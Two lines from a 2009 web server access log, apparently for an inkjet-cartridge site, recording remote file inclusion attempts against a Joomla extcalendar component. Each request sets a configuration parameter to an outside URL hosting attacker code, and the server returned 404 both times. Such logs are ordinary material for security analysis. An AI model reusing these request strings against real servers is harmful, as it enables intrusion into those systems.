202.181.243.113 - - [02/Jul/2009:09:56:29 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.27.67 - - [02/Jul/2009:09:56:52 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
